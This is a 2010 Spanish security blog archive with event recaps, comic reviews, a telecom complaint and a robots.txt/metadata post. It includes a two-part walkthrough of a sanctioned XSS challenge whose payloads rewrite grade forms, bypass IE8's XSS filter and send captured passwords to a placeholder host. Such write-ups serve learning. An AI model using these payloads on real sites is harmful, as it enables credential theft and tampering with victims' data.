martes, marzo 30, 2010

Presentaciones del Asegúr@IT 7

El evento Asegúr@IT 7 terminó y, como en esta ocasión no grabamos vídeo, os voy a dejar aquí las presentaciones y la información de las charlas. Tampoco hay material gráfico de las cerves y las tapas de la noche antes:

Playing in a Satellite Environmet 1.2
- Leonardo Nve, de S21Sec
- Christian Martorella, de S21Sec



Forefront Unified Access Gateway UAG 2010
- Chema Alonso y Alejandro Martín Bailón, de Informática64


Todo lo que se contó aquí está o estará escrito en forma de posts en Seguros con Forefront.

Del Doctor Birufilla a Armorria
- Raúl y Niko, de Nikodemo Animation.

Los creadores de Cálico Electrónico decidieron no traer diapositivas, así que nos alegraron la charla contándonos sus inicios, con el el proyecto de El País de las Tentaciones donde crearon la serie "Sabias Lo Qué?" y su Doctor Birufilla. Todos los capítulos de esta serie están ahora en www.sabiasloque.com. También nos habalaron del proyecto común que han lanzado los creadores de contenidos independientes en Internet. Cálico Electrónico, Malviviendo y un gran grupo, han hecho NikodemoTV para aunar esfuerzos en la difusión de sus contenidos. Además, tienen abierto un festival de series Web con un premio de 14.000 €. De todas formas, puedes seguir a estos dos piezas en sus cuentas twitter: @escolano y Nikotxan.

Serialized SQL Injection
- Dani "The Doctor" Kachakil.


Dani estubo hablando de las técnicas de Serialized SQL Injection y aprovecho para lanzar la versión nueva de SFX-SQLI, la herramienta que ha creado para realizar ataques de Serialized SQL Injection contra bases de datos MS SQL Server. En la nueva versión ha añadido la posibilidad de cambiar de base de datos mediante consultas a la master. Ha publicado el código fuente y la nueva version de la tool en su web.

La Foca 2.0 y MetaShield Protector
- Chema Alonso y Alejandro Martín Bailón, de Informática64


La FOCA 2.0 llegó en una versión muy alpha a la RootedCon, y es por eso que aun no hemos querido ponerla disponible para descarga. La versión que vimos en el Asegúr@IT era un poco más avanzada, pero aun no es lo que se espera de ella, pero... ya va pareciéndose mucho a lo que queremos. El próximo día 20 de Abril es la fecha que nos hemos marcado para su lanzamiento público como versión alpha. MetaShield Protector puede ser descargado en versión Trial.

Saludos Malignos!

Vulgares copias

Una vez que se ha alcanzado el número tropecientoscuachomil en superhéroes, podríamos decir que el universo está lleno de vulgares cópias de los héroes originales y, en concreto, de ese que hace casi un siglo publicó un comic que se ha vendido por 1,5 millones de Euralios.

Sin embargo, he de decir que soy el primero que disfruto con Batman, Spiderman, Los X-Men, y demases del MainStream, así como con los héroes del Long-tail que se han ido creando a lo largo de los últimos 30 años desde que aparecieron los superheroes de las nuevas compañías, tales como WILDCats, Spawn, Darkness o WitchBlade. Sí, no me voy a olvidar de las obras de autor como Hellboy, Sin City, Ex-Machina o Los Muertos Vivientes, que tantas horas me roban...

..pero el post de hoy no quiere hablar de esas vulgares copias, sino de las "vulgares copias" que se hacen dando una vuelta más de tuerca. Hace tiempo lei que la historia está condenada a repetirse la primera vez como tragedia y la segunda como comedia. Hace ya tiempo que en el mundo de los superheroes hemos llegado a la comedia y en España se hace muy buena.

Hay un par de "vulgares copias" que se generan en España sobre el mundo de los super-heroes que atesoro y releo de vez en cuando. Son los comics de SuperLopez y Pafman.

SuperLopez, después de años de duro trabajo de Jan, es un personaje mítico en el que, a diferencia del original Superman, la periodista no está enamorada del héroe e ignora al hombre de a pie, sino que está enamorada del hombre y odia a la "supermedianía". Tronchantes historias con la colaboración de Jaime que, al contrario de Jimmy Olsen, se dedica a dar por culo al heroe. Era inevitable no hablar algo de SuperLopez en este post, pero se merece uno para él solito.

Por el contrario, a diferencia del super-mega-archiconocido SuperLopez, dentro del mundo de las "vulgares copias" hay un heroe que me roba las carcajadas. Ese es Pafman. Sí, en el último número ha venido el mismísimo Batman a darle un par de hostias por ser tan cutre copiándole, pero las historias de Pafman son únicas.


Pafman y Pafcat originales

Después de un comienzo que llevo a nuestro héroe a ser complemento en revistas de Mortadelo y Filemón desde el año 1987, consiguió, a partir del año 2004, tener su serie de tebeos y, desde el año pasado, que sean editados en pasta dura.


Pafman redevolvió a partir de 2004

No es fácil abrise un hueco en un mundo de "vulgares copias". Sin embargo, he de confersar que disfruto más hoy en día una historieta de Pafman que la mayoría de las historias de Batman. Tener a un héroe de Logroño, donde las aventuras pasan en las torres de negocios de la parte finaciera de la ciudad, donde hay una base americana a las afueras de Logroño o donde la selva Logroñesa, de kilómetros y kilómetros de extensión es capaz de esconder los más viles planes de los malvados es genial.

Además el héroe tiene a a la Teniente Tonas como sobrina, haciendo honor a su apellido, como colaboradora en la polícia, a un gato más salido que el pico de una plancha, Pafcat, que quiere tocarle el apellido a la sobrina, donde el doctor Pacostein (rememorando otra serie del mismo autor) vive con el brazo de un zombie enroscado a su cuello o los infinitos cameos... es priceless. Esta es la intro de la penúltima historieta, El Agente Secreto Cero Cero Patatero.

Si te gustan los comics, y te gusta Mortaledo y Filemón o SuperLopez y no conoces Pafaman... deberías ir corriendo a tu traficante de drog... digo... tienda de comics más cercana y comprarte un número ya.

Saludos Malignos!

lunes, marzo 29, 2010

Materiales de Construcción

Me ha sorprendido ver la preocupación que mucha gente ha mostrado por el tema de los informáticos en riesgo de exclusión social. El post ha recibido aportaciones interesantes y preocupantes en los comentarios, así como alguna historia personal que también me ha llegado al correo.

Supongo que, conociendo esta situación a la que nos enfrentamos en esta profesión, muchos hacéis como yo e intentáis estar todo lo que se puede al día. Para ello lo mejor suele ser leer, estudiar y aprender. No todo se puede probar, menos cuando tienes que trabajar, por ello las conferencias y los cursos intensivos suelen ser lo más cómodo.

- Presentaciones de la RootedCon: Ya están disponibles en la cuenta de slideshare de RootedCON las presentaciones utilizadas en el congreso. Hay un total de 21 charlas en las que puedes acceder, más o menos, al contenido de cada una de las sesiones. Es cierto que una ppt no es toda una charla, pero en algunas ocasiones es más que suficiente para entender los puntos principales.


- Videos de Conferencias de Seguridad Informática: Por suerte, la mayoría de las conferencias internacionales suele hacer una recolección de los materiales generados. Andar buscándolos por Internet es un trabajo tedioso, por lo que os voy a recomendar el post de José Antonio Guasch en SecurityByDefault donde hace una lista de ellos y, por supuesto, la web de SecurityTube.NET, donde hay varias conferencias completas recogidas.

- Materiales de nuestras charlas: Normalmente yo procuro recoger todo el material de las charlas que organizamos nosotros. Suelo subir los videos a algún sitio, ponerlos en el blog y recapitularlos en usta URL de la web de Informática64 [Eventos Online]. Además, todas las prsentaciones terminan en mi cuenta de SlideShare, así que si no está allí, estará pronto. Ahora tengo pendiente subir las últimas diapostivias utilizadas en el Asegúr@IT 7 y en la Gira Up to Secure 2010 -lo haré en breve-.

- Cursos intensivos: Alejandro Ramos, Dab, en su presentación de la RootedCON titulada "Operación Triunfo Personal" recogía algunos cursos, masters de postgrado y formaciones especializadas. Nosotros desde i64 tenemos, nuestro calendario de Hands On Lab, de Virtual HOLs para hacer a través de Internet y el FTSAI, pero también puedes acceder a los Webcasts que hacen los fabricantes de software o conferencias internacionales. Aprovecha lo que puedas.

Y por supuesto, selecciona bien tus canales RSS, estar suscrito a 500 canales RSS no te da el conocimiento de 500 sitios porque luego no los lees y tienes que pasar página, así que selecciona aquellos blogs que te aportan algo de conocimiento.

Saludos Malignos!

domingo, marzo 28, 2010

¿Orange? Y una mierda

Ya os conté tiempo ha el suceso de los 0.86 € con Orange, pero la historia ha continuado y tiene visos de ser divertida. Os voy a contar algunas cosas con dos líneas de teléfono contratadas con Orange.

Linea 1: Una línea son "sobre-pago" y la estafa de los 1.000 minutos.

La historia de esta línea es la historia de una portabilidad realizada por teléfono. Digamos que una de las llamadas infinitas esas que hacen los comerciales de Orange llegó justo en el momento en que había una incidencia por telefónica, y con una oferta muy competitiva en precio, la oferta fue aceptada y se hizo el contrato telefónico. Y ahora os cuento la "estafa":

La broma es que el comercial te cuenta toda la película y cuando el nuevo cliente está a conforme pasa a contratación donde le leen algo parecido, pero no lo mismo y donde, por supuesto, no te leen todas las claúsulas del contrato.

La historia de esta línea es que el comercial dijo que había 1.000 minutos al mes gratis en llamadas a teléfonos móviles y que el precio iba a ser siempre de 27 €/mes (o similares) por las llamadas locales/provinciales y la línea ADSL. Todo ok, pero cuando se pasa contratación te leen una cosa similar pero no lo mismo. La persona que contrata tiene dudas por lo que la persona de contratción para el contrato y lo devuelve a comercial. El comercial vuelve a decirle que va a ser así, com él ha dicho, a pesar de que en el contrato lo pongan "con otras palabras".

Lógicamente, lo que manda es lo del contrato, pero ese contrato el cliente nunca lo puede ver porque es telefónico y no puedes leer las claúsulas, que ya las enviarán... pero que nunca llegaron.

Esta línea fue domiciliada por banco y meses después, sin más preocupación, y pensando en que la oferta es buena, se recibe una llamada del departamento de riesgos de Orange que dice que su gasto este mes es alto en llamadas a móviles y salta la alerta. En una conversación que es más o menos así:

- ¿Más de los 1.000 minutos que hay gratutitos al mes?
- Verá, según su contrato, los 1.000 minutos gratis eran sólo el primer mes.
- Ya, pues no, a mi me vendieron otra cosa, quiero mi contrato para comprobarlo.
- Hable con el departamento de atención a cliente, aquí estamos en riesgo y este mes su consumo ha sido superior a 100 € y necesitamos un depósito en garantía para seguir dándole servicio el resto de los meses.
- ¿Y el resto de los meses anteriores?
- Pues entre 70 y 90 € ha consumido usted.
- ¿Y se han pagado por banco todos los meses anteriores y éste?
- Sí, pero para seguir dándoles servicio necesitamos un depósito de 100 € en la siguiente cuenta.
- Osea, que sólo el primer mes me habéis puesto los 1.000 minutos y el resto me estáis cobrando por un contrato que no me habéis pasado. Habéis pasado la factura 6 meses por banco y os he pagado y ahora me decís que ¿os tengo que ingresar dinero por anticipado o me cortáis el servicio?
- Sí, por riesgo de impago.
- Pero si he pagado siempre.
- Sí, pero como el consumo ha sido alto está en riesgo, si no paga, en 48 horas le cortamos el servicio.
- Pues no pienso ingresar el dinero en ninguna cuenta.
- Usted mismo.


A los 10 minutos de esta conversación el servicio de Orange fue suspendido y tuvieron que estar 2 días con 3G hasta que llegó de nuevo el servicio de Telefónica.

Linea 2: Orange cobra por Contrato no por Servicio

La historia de esta línea ya os la avancé, es el caso de una contratación fallida, en la que Orange intenta dar servicio en una casa, pero no puede porque no están preparadas las lineas. Al final, tras reconocer que no pueden trabajar, emiten una factura de 0,86 € que, para no tener problemas, se decide pagar y punto.

Pero... los amigos de Orange, a pesar de decir que está cancelado el contrato, al mes siguiente emiten una factura. Se habla con ellos y se dice que sí, que la van a anular, que no se preocupen.

Sin embargo, la factura no se anula y pasa al departamento legal, y llaman los abogados. Una empresa externa contratada por Orange que dice que van a tramitar la denuncia por impago al día siguiente. Que si quieren evitarse problemas que paguen los 40 € y luego hablen con reclamaciones. Y lo más sorpendente... que Orange cobra por contrato y no por servicio así que aunque no hayan dado servicio nunca, pueden cobrar. Por supuesto, el contrato había sido por teléfono y nadie tenía el contrato.

Actualmente se pagó esta factura y se está esperando que devuelvan el dinero. Sí, les han dicho que no habrá problema pero... ¿será verdad o llegará la factura del mes que viene?

Conclusiones de esta historia:

1.- No contratar nada por teléfono.
2.- No contratar nada con Orange.

Si alguien te pregunta por una ADSL... recomienda cualquiera menos Orange.

Saludos Malignos!

sábado, marzo 27, 2010

Incomprensibles incomprendidos robots

No, no es un título del gran Asimov, es que cuanto más miro el tema del fichero robots.txt más creo que nadie tiene claro cómo funcionan realmente. Ya puse aquí el carajal que supone configurar un robots.txt entendible por todos, pero incluso, suponiendo que funcionan como dicen que funcionan la cosa no tiene mucho sentido.

En teoría, tal y como ya os puse en este post, el bot de Google primero ejecuta los disallow y luego el resto. ¿Cómo debería comportarse con el robots.txt de justice.gov que os pongo a continuación?


El incomprensible incomprendido robots.txt

Pues si hacemos caso a como se supone que debería trabajar, debe aplicar la configuración asociada a su User-Agent, pero … ¿cuál es esta? Viendo la lista parece “lógico” e “intuitivo” que debería aplicar la configuración de User-Agent:*. Después, ejecutar todos los disallows e indexar el resto. Así, la siguiente ruta de documentos debería estar indexada en Google.


URL de los ficheros: http://www.justice.gov/ust/eo/private_trustee/library/

Sin embargo, la realidad no es así, ya que éste fue el ejemplo que usé para el post de “Buscando Buscadores” en el que se podía ver como había documentos que no aparecían. Así, si hacemos una búsqueda en Google por documentos wpd se puede ver que no aparece ninguno.


Ni un fichero wpd que llevarse a la FOCA con Google

Esto es bastante curioso, ya que parece que ha aplicado el Disallow:* que “parece” que el administrador del sitio sólo quería aplicar al bot de Microsoft. Conocido esto, y escribiendo la segunda parte del post de “Buscadores como Armas de destrucción masiva” se me ocurrió que era el ejemplo perfecto para saltarse el robots.txt de este sitio e intentar hacer que todos los documentos acabasen siendo indexados en algún buscador.

Conocida la lentitud de Google a la hora de buscar, decidí probar a usar algún buscador con algún bot “menos ocupado”, así que me fui a usar el bot de Exalead para intentar indexar esos documentos saltándome la restricción del robots.txt pero… cual sería mi sorpresa al ver que no hacía falta.

Mi presunción errónea había sido suponer que este buscador se comportaría como Google, pero… ¿por qué? ¿realmente hace Google una interpretación certera del fichero robots.txt tal y como lo deseaban los administradores? ¿Qué sucedería si Exalead sí se comportara como los administradores de justicia.gov “desean”? Pues que todos esos documentos, que no se encuentran en una ruta prohibida por Disallow para los bots con User-Agent:* acabarían indexados…. Y así sucede.


Comida para la FOCA en Exalead

Como se puede apreciar hay una autentica mina de datos y metadatos indexados en este buscador que pueden ayudar a obtener información jugosa con Exalead-Hacking.


Metadatos a cascoporrro

Lo realmente preocupante es…¿es esto lo que querían hacer los administradores? Yo creo que no, pero simplemente les ha salido mal la configuración que “aparentemente” les funcionaba bien con Google y Microsoft. ¿Estás seguro de que tu robots.txt te protege de todos los buscadores?

Saludos Malignos!

viernes, marzo 26, 2010

DGT FX con RSA 1024 y la junta de la trócola

Desde luego esto de los trucos de hacker "a lo Mitnick" no deja de sorprenderme. Este me ha sacado una carcajada con eso del DGTFX. Lo primero que ha hecho mi cerebro es intenter traducir las siglas (mal de todo informático) y me ha salido algo como Dirección General de Trafico FX [Efectos Especiales]. Pero me ha matado el final, eso de que mi correo esté cifrado con RSA 1024 es un detalle.


Cifrado RSA 1024 y la junta de la trócola con el cajón del pugilate

Está en perfecto castellano, pero no me ha quedado claro lo que tengo que hacer... ¿lo relleno con un replay? ¿Lo mando a otra dirección? ¿No hay un número de fax a donde poder enviarlo? Y por cierto.. ¿qué virus ha detectado el fantástico DGTFX? Como se nota que es Viernes y hay gente con tiempo libre...

Saludos malignos!

jueves, marzo 25, 2010

Informáticos en riesgo de exclusión social

Entre la cantidad de mails que inundan mi, a veces, ingobernable buzón de correos personal (ya va camino de los 7 Gb), llegó hace un poco tiempo uno que me dejó impactado y os quiero hablar de él.

En la vorágine de actividad en la que me encuentro suele resultar difícil palpar la situación en la que se encuentra el mercado laboral para el resto de los informáticos. Cuando me preguntan sobre cómo les va a los informáticos en España o como está el curro para los informáticos en Madrid me suele costar contestar. Sin embargo, cuando veo en listas de correo que hay gente de un nivel que te cagas buscando curro después de haber vivido épocas en las que la gente cambiada de trabajo como de camiseta algo, desde luego, no está yendo muy fino.

Día a día me encuentro con gente que está en la calle porque se quedó sin proyecto y le está costando encontrar curro y, por supuesto, casos de gente que ha negociado a la baja su situación económica para poder acceder a un puesto de trabajo en condiciones profesionales similares o de más responsabilidades. Supongo que este es “el ajuste” que decían desde el gobierno que seguirá con la crisis y que, en algunos casos, ha colocado a alguien que estaba por encima de su valía en su sitio, pero que, en otros, se ha llevado por delante a buenos profesionales.

El problema se agrava cuando nos enfrentamos a gente acostumbrada a una tecnología y con dificultades para adaptarse a nuevos entornos o la evolución constante de este sector. Es evidente que muchos de nosotros hacemos de este trabajo nuestro hobby o de este hobby nuestro trabajo, pero no todo el mundo quiere o puede estar 23 horas al día aprendiendo nuevas cosas.

La pregunta es… ¿podrá un programador de COBOL adaptarse al nuevo mercado laboral si pierde su puesto de trabajo? ¿Basta con saber un poco de informática hoy en día para obtener un curro de informático? ¿Hay cabida para los profesionales hoy en día en esta industria?

Este es el mail que recibí de un asistente a alguna de las charlas. Su situación es la de una persona que ha venido de fuera, de edad madura y que se encuentra sin trabajo.


El trabajo ese al que se refiere es el de mulero para la industria del malware. Tanto si se sabe lo que se hace como si no se sabe lo que se hace, la conclusión final es la misma, es la de terminar en los tribunales, no sé exactamente con qué cargos y que condena.

Está claro que, tanto como si estás empezando tu carrera profesional, como si estás en mitad de ella, tienes que tener en cuenta cual va a ser tu plan de carrera para el final de la misma o te arriesgas a quedarte en una situación bastante complicada para conseguir terminar tu carrera como informático. Parece que estamos condenados a meternos en gestión, a dirigirnos al área comercial o el marketing, si no, nos convertiremos en un sector de riesgo de exclusión social.

¿Os imagináis en los bancos, compañías de seguros, etcétera cruzando nuestra edad con nuestra profesión de informático y metiéndonos en una profesión de riesgo? Ni me lo hubiera imaginado al comenzar mis estudios de informática.

Suerte H. que el sector te absorba y no que de lo famélico que está te fagocite.

Saludos Malignos!

miércoles, marzo 24, 2010

Solucionario Reto BrowserSchool [II de II] por Beni

******************************************************************************************
- Solucionario Reto BrowserSchool [I de II] por Beni
- Solucionario Reto BrowserSchool [II de II] por Beni
******************************************************************************************

Internet Explorer / Asignatura 1

Lo más difícil del reto ha sido saltarse la protección que trae de serie Internet Explorer 8, o sea, el filtro anti-XSS. Viendo la clasificacion final parece obvio que no he sido el único al que le ha costado aprobar con el profesor 3.

Viendo lo que pasaba al pulsar el botón para aprobar o suspender, lo que hice para esta primera asignatura fue copiar y pegar la dirección que aparecía tras esta acción para usarlo como piedra angular de la solución:

GestionNotas.aspx?cbEvaluacion=1%26idMensaje=b003467e-4a1f-4c37-abda-2cc74ac17611

Si logramos que el profesor entre en esa página, entonces estamos aprobados. Buscamos en la red como saltarnos el filtro de IE8 y por los resultados obtenidos vemos que no es imposible hacerlo, especialmente por un articulo de Cesar Cerrudo que me fue de mucho provecho. En el se explica como usar un overlay por CSS para tapar la web original con un enlace, sin usar ningún tag de HTML que haga saltar el filtro, solo con [a] y [div].

Los primeros intentos los dirigí a obtener un layer transparente, que lograba el objetivo al pulsar en cualquier parte de la web menos en los controles que eran los que más importaban. Al no convencerme del todo, hice que el [div] pillara el aspecto de los botones que había y lo coloqué encima del botón existente ajustandolo poco a poco con un posicionamiento relativo. Si esto lo pude hacer fue porque el estilo del botón era muy simple, sin imagenes que habrían hecho saltar el filtro. O sea, esta es la forma:

- a=2[a href='X'][div class='BotonNormal' style='position:relative;width:47px;left:335px;top:-105px;padding:3px']Enviar[/div][/a]

Reemplazando la X del href por la ruta anterior, conseguimos el aprobado de esta asignatura.

Internet Explorer / Asignatura 2

Gracias a que tenemos la contraseña de aula de esta asignatura, obtenida con el Chrome o con el Firefox, podemos usar lo mismo que antes despues de haber posicionado el botón en su sitio:

- a=2[a href='GestionNotas.aspx?rbEvaluacion=1%26tCodigoAula=%255B%2523%2523%2524%2524123456%2eabcdef%2524%2524%2523%2523%255D%26idMensaje=8131f157-98f6-46d9-82e2-11031f5ea2da'][div class='BotonNormal' style='position:relative;width:47px;left:170px;top:142px;padding:3px']Enviar[/div][/a]

Internet Explorer / Asignatura 3

Al no tener la contraseña del profesor 3, no se puede repetir el truco que usamos en la asignatura. Volviendo al ejemplo de Cesar Cerrudo:

- a=2[a href='aula_3.aspx?idMensaje=b381de4b-7952-445a-8e99-85b28fcf9ecf%26idUsuario=d6471dea-8298-42aa-ab9d-6550b75fc471%26solucion=a=2[sc%0aript src=%22http://www.xxxx.es/script1.txt%22][/script]'][div class='BotonNormal' atyle='position:relative;width:75px;left:188px;top:141px;padding:3px']Suspender[/div][/a]

Para evitar que salte el filtro, subimos un fichero con el script deseado a cualquier web; e.g: http://www.xxxx.es/script1.txt contiene este código:

function f(){document.getElementById('resultado').value=1};
window.onload=function(){document.getElementById('bSuspender').onclick=f}


Esto requiere de dos pasos, o sea, al rellenar el form y enviarlo, el profesor vuelve a ver el form en blanco y tiene que volver a rellenarlo y mandarlo otra vez, pero os garantizo que por suerte coló.

Para sacar la contraseña del profesor, hacemos mas o menos lo mismo, pero con otro script; e.g: http://www.xxxx.es/script2.txt con este código:

document.getElementById('fcalificar').action='http://www.xxxx.es/p3/'

CONTRASEÑA PROFESOR 3: MsExplorer8.0.2009_%,..,

Despedida y cierre

Gracias a Microsoft y a Informatica64 por el reto y por la generosidad en los premios ofrecidos y enhorabuena al resto de ganadores y demás participantes.


******************************************************************************************
- Solucionario Reto BrowserSchool [I de II] por Beni
- Solucionario Reto BrowserSchool [II de II] por Beni
******************************************************************************************

martes, marzo 23, 2010

17 Errores y medio en una presentación técnica

Junto con el gran Gonzalo Álvarez de Marañón, recapitulamos estos 17 errores y medio a la hora de presentar una charla. Aquí van recogidos:

1) Lo mejor es que me presente leyendo todo mi curriculum, todas las empresas en las que he trabajado, todos los premios que he ganado, todos mis logros profesionales y algunos personales, porque a la gente le encantan las historias humanas y en el fondo me adoran. Han venido a escucharme a mí.

2) Yo hablo de lo que a mí me interesa. Al público es mejor no tenerlo en cuenta a la hora de seleccionar el tema ni el enfoque ni la profundidad, porque carece de mi nivel de conocimientos y realmente no sabe lo que quiere escuchar. Yo decido lo que deben saber y aprender de mi charla.

3) Como todos los asistentes tienen Internet, es mejor que se descarguen y prueben en sus casas el programa cuyo funcionamiento estoy explicando con 200 transparencias. Mejor no incluir una demo durante la presentación, no sea que falle y me haga quedar mal. Eso de las demos está muy visto.

4) La demo falla una y otra vez, pero yo paro la presentación y me empecino en que funcione a toda costa, porque no hay nada que la audiencia desee más en el mundo que ver la demo y está dispuesta a esperar horas hasta que salga bien.

5) El texto de las ventanas y menús de los programas cuyo funcionamiento muestro durante la demo es tan pequeño que nadie sentado más allá de la quinta fila ve nada, pero estoy seguro de que no les importa porque yo la veo de maravilla y ellos perciben subconscientemente que es una demo superchula.

6) Voy a hacer la demo lo más rápido que pueda para que vean que me lo sé muy bien. Si ellos me siguen o no es su problema, no soy su padre, he venido a enseñar a los que me siguen, no al resto.

7) Si algo falla durante la demo, voy a pedir perdón hasta el final porque soy un hombre muy sufrido y quiero que ellos perciban que realmente estoy afectado porque la charla que están viendo no es tan buena como yo hubiera querido.

8) Si necesito cualquier cosa para hacer una demo, ya lo pediré a los organizadores en el mismo momento en que lo necesite, porque seguro que ellos tienen una conexión a Internet sin proxy, con buena cobertura y accesible cuando yo la pida o cualquier otra cosa que pueda necesitar sobre la marcha.

9) Como no me sé muy bien el tema sobre el que tengo que hablar, lo mejor es poner todo el texto en las transparencias y leerlo palabra por palabra. Si además doy la espalda al público mientras leo, mejor, porque así no ven que estoy nervioso.

10) No necesito probar ni conocer a fondo todos los programas que menciono en mi charla. Después de todo, ¿quién tiene tiempo para tantas cosas como hay en Internet?

11) Es mejor no preparar la charla en absoluto, para que sea espontánea y la gente vea lo geek que soy y lo bien que improviso. A mí me dicen cualquier tema y yo soy capaz de hablar durante horas. Me encanta fluir.

12) Es mejor llevar mil transparencias. Más vale que sobre que no que falte. Si me paso del tiempo asignado no importa nada, porque mi charla es tan interesante que todo el mundo, incluso el ponente que va después, están deseando quedarse escuchándome el tiempo que haga falta.

13) Cuando me hacen preguntas, respondo contándoles mi vida y aprovecho para hablar de mí, de mi empresa, de mis productos, de lo buenos que somos. Si respondo o no a la pregunta es irrelevante, después de todo sólo un necio preguntaría algo después de mi charla esclarecedora.

14) No tengo mucho tiempo, así que me voy a pasar todo el rato recordándoles que esta charla no es buena por falta de tiempo. Les recordaré también que no hay demo porque no hay tiempo. No tengo ni idea de cómo lo hacen en el Telenoticias. Con solo media hora les da tiempo a contar tantas cosas…

15) Para no molestar con ruidos voy a hablar bajito y monótono. De esta forma, si alguien quiere dormir yo no le voy a molestar.

16) Para que vean que soy un tipo activo voy a moverme por la sala lo más rápidamente que pueda, voy a mover muchos los brazos, y mucho el ratón en todas las ventanas, porque quiero que vean que sudo la camiseta.

17) No dejaré ningún silencio entre frase y frase, no vayan a creer que la charla ha terminado, por lo que voy a buscarme una coletilla chula. Algo como “ehhhhhh”, “¿vale?”, “¿de acuerdo?”, “¿entendido?”, “¿estamos?”, “uuuhmmmm”, o lo que sea, lo importante es que esté emitiendo sonidos durante todo el tiempo de la charla.

Y medio) Si la audiencia se aburre es culpa de ellos. ¿Cómo puede no interesarle a alguien mi charla si soy el mejor ingeniero del mundo? Después de todo, yo soy ingeniero, no cómico. Para pasar un rato entretenido ya está el cine.

Entrada escrita junto con Gonzalo, de El arte de Presentar.

Saludos Malignos!

Mañana el Asegúr@IT 7, hoy la Previa

Mañana es el día elegido para que tenga lugar el Asegúr@IT 7 en Barcelona y esta noche tendremos la cena de la Previa Lúdico Festiva (recibirás por mail la dirección del garito si te apuntas a tan excepcional acontecimiento).

En el evento Dani Kachakil mostrará las tecnicas de Serialized SQL Injection y liberará una evolución de SFXI, la herramienta para hacer Serialized SQL Injection en bases de datos SQL Server. Leo y Christian, de S21Sec, impartirán la charla que han llevado al rededor del mundo en las conferencias más importantes de seguridad sobre como hackear en conexiones satelitales. Nosotros llevaremos la FOCA 2.0 y MetaShield Protector para que los que no la han visto aun funcionar (si no vienieron a la RootedCon que es el único sitio donde se han enseñado aún) lo puedan hacer. Habrá una charla sobre VPNS-SSL dedicada a Forefront UAG y terminaremos con Nico & Raúl, los creadores de Cálico Electróncio, para tener una jornada divertida con estos dos catalanes enfrentados por el futbol.

Aún te puedes registrar para ambos eventos, ¡nos vemos esta noche cuando regrese de mi periplo por Orense donde estoy ahora!.

- Agenda y Registro Asegúr@IT 7.
- La Previa Lúdico Festiva.

Saludos Malignos!

lunes, marzo 22, 2010

Solucionario Reto BrowserSchool [I de II] por Beni

******************************************************************************************
- Solucionario Reto BrowserSchool [I de II] por Beni
- Solucionario Reto BrowserSchool [II de II] por Beni
******************************************************************************************

Introduccion

El objetivo de este documento es el de explicar como resolví el reto de hacking BrowserSchool desarrollado por Informatica64 para Microsoft. Este reto estuvo habilitado desde las 9:00 del 16/12/2009 hasta las 12:00 del 17/12/2009.

Se trataba de conseguir que los profesores nos aprobaran a su pesar, porque en realidad ellos no tenian mas intención que la de suspender a todos los alumnos sistematicamente. El alumno debía enviar su solucion, un texto que aparecía de
forma literal en la pagina web que usaban los profesores para corregir, lo que
lo hacía vulnerable a ataques XSS.

Había tres personas reales haciendo de profesores y cada uno de ellos usaba un navegador diferente para ver y corregir los exámenes. Todos ellos con la última versión instalada por defecto y sin complementos de estos navegadores:

- Profesor 1: Google Chrome 3
- Profesor 2: Mozilla Firefox 3.5
- Profesor 3: Internet Explorer 8


A su vez había tres asignaturas cuyo nivel de dificultad iba en aumento:

- Asignatura 1: Formulario sin contraseñas.
- Asignatura 2: Una contraseña de aula; la misma para todos.
- Asignatura 3: Cada profesor con su usuario y contraseña.


Además, obteniamos puntos extras al conseguir cualquiera de estas contraseñas.

Chrome y Firefox / Asignatura 1

El form tenia un combo con dos opciones (suspender y aprobar) y un botón para confirmar la seleccion. Para los profesores 1 y 2 mandé estas soluciones:

- a=2[script]document.getElementById('cbEvaluacion').value=1[/script]
- a=2[script]document.getElementById('cbEvaluacion').options[0].value=1[/scrip
t]


La primera era un script que cambiaba la opción seleccionada por defecto y la segunda obligaba a que las dos opciones del combo valieran 1 (aprobar).

En IE8 no funcionan por culpa del molesto filtro anti-XSS que lleva integrado y que bloqueaba la inmensa mayoría de las pruebas que hice, asi que voy a dejar las soluciones del IE8 para el final, por ser las mas complicadas y costosas.

Chrome y Firefox / Asignatura 2

Aquí el form tenia dos radiobuttons (suspender y aprobar) y un botón para confirmar la selección. También había que considerar el lugar donde se veía la solución enviada, porque en este caso salía antes de los controles y eso hace que Javascript no pueda acceder a los objetos del DOM que todavía no han sido instanciados, entre ellos los radiobuttons y el botón. Lo más sencillo puede que sea asociar una funcion al evento LOAD de la página:

-
a=2[script]window.onload=function(){document.getElementById('rbEvaluacion').
value=1}[/script]


Para sacar la contraseña de aula podemos hacerlo tal que así, para que al pulsar el botón se redireccione a la página que queramos, con la pass enviada como parametro a esa página:

- a=2[script]function
f(){window.location='http://www.xxxx.es?c='%2Bdocument.getElementById('tCodi
goAula').value);return false;}; window.onload=function()
{document.getElementById('enviar').onclick=f;}[/script]


Pero tenemos que codificarla antes porque tenía caracteres raros. Yo usé este código para sacarla en valores ASCII separados por una x:

- function cod(en){var
o='';while(i[en.length){o=o+'x'+en.charCodeAt(i++)};return o};


Queda así la solución buena:

- a=2[script]function cod(en){var
o='';while(i[en.length){o=o+'x'+en.charCodeAt(i++)};return o};function
f(){window.location='http://www.xxx.com?c='%2Bcod(document.getElementById('t
CodigoAula').value));return false;}; window.onload=function()
{document.getElementById('enviar').onclick=f;}[/script]

CONTRASEÑA DE AULA: [##$$123456.abcdef$$##]


Todo esto tampoco funciona en IE8 porque lo bloquea el filtro anti-XSS.

Chrome y Firefox / Asignatura 3

Aquí el form tenía dos botones (suspender y aprobar) y dos cajas de texto para meter el usuario y la contraseña del profesor. Muy parecido a lo de antes, haremos que retorne el valor 1 al apretar el botón suspender:

- a=2[script]function f(){document.getElementById('resultado').value=1};
window.onload=function (){document.getElementById('bSuspender').onclick=f}[/script]


Para sacar la password de los profesores lo hacemos de forma parecida a como se hizo en la asignatura de antes:

- a=2[script]function
f(){window.location='http://www.xxxx.es?p='%2Bescape(document.getElementById('tpassword').value);return false;}; window.onload=function()
{document.getElementById('bSuspender').onclick=f;}[/script]

CONTRASEÑA PROFESOR 1: --[000chrOmeEmorhC000]--
CONTRASEÑA PROFESOR 2: ##F1R3F0Xxoferif......:)


******************************************************************************************
- Solucionario Reto BrowserSchool [I de II] por Beni
- Solucionario Reto BrowserSchool [II de II] por Beni
******************************************************************************************

domingo, marzo 21, 2010

RootedCon is over

Se acabó. Se pasaron los tres días de encuentros, charlas privadas, conferencias, reuniones con amigos lejanos, cenas, comentarios de jugadas y entretetenimientos varios.

Este tipo de conferencias no son sólo "las conferencias". En este tipo de sitios cuenta mucho "el tercer tiempo". Ese lugar que está más allá de la hora de finalización de la agenda del día en una cafetería, un bar o un restaurante, donde puedes compartir cosas con los compañeros.

